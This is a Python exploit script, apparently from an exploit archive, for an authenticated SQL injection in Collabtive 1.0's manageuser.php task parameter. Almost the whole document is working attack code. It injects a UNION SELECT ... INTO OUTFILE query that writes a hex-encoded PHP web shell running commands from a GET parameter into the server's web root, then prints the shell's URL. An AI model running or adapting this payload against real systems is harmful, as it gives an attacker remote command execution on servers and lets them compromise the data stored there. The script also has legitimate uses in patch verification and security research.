# Exploit Title: Collabtive 1.0 SQLi # Date: 06/17/2013 # Exploit Author: drone (@dronesec) # More information: http://forelsec.blogspot.com/2013/06/collabtive-10-sqli.html # Vendor homepage: http://collabtive.o-dyn.de/ # Software link: http://downloads.sourceforge.net/project/collabtive/collabtive/1.0/collabtive-10.zip # Version: 1.0 # Fixed In: https://github.com/philippK-de/Collabtive # Tested on: Ubuntu 12.04 (apparmor disabled) """ Collabtive 1.0 SQL injection web shell Requires authenticated user. """ from argparse import ArgumentParser import string import random import urllib, urllib2 import sys def run(options): print '[!] Dropping web shell on %s...'%options.ip shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5)) # <? php system($_GET["rr"]); ?> exploit = '{0}%20UNION%20SELECT%200x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'\ '%20INTO%20OUTFILE%20\'{1}/{2}.php\''.format(options.task,options.path,shell) query_string = 'action=profile&id={0}&project={1}&task={2}'.format(options.id,options.project, exploit) request = urllib2.build_opener() request.addheaders.append(('Cookie', 'PHPSESSID=%s'%options.session.strip())) try: request.open('http://{0}{1}/manageuser.php?{2}'.format( options.ip, options.rootp,query_string)) except: pass print '[!] Shell dropped. http://{0}{1}/{2}.php?rr=ls'.format(options.ip, options.rootp, shell) def parse(): parser = ArgumentParser() parser.add_argument("-i", help='server address', action='store', dest='ip', required=True) parser.add_argument('-P', help='valid php session id', action='store', dest='session', required=True) parser.add_argument("-p", help='path to manageuser.php (/collabtive)',action='store', default='/collabtive', dest='rootp') parser.add_argument("-w", help="writable web path (/var/www/collabtive)",action='store', default='/var/www/collabtive', dest='path') parser.add_argument('--id', help='collab id (1)', action='store', default=1, dest='id') parser.add_argument('--project', help='project id (1)', action='store', default=1, dest='project') parser.add_argument('--task', help='task id (1)', action='store', default=1, dest='task') options = parser.parse_args() options.path = options.path if options.path[-1] != '/' else options.path[:-1] options.rootp = options.rootp if options.rootp[-1] != '/' else options.rootp[:-1] return options if __name__=="__main__": run(parse())Брой прочитания на тази страница: 1516
Collabtive 1.0 (manageuser.php, task param) – SQL Injection Vulnerability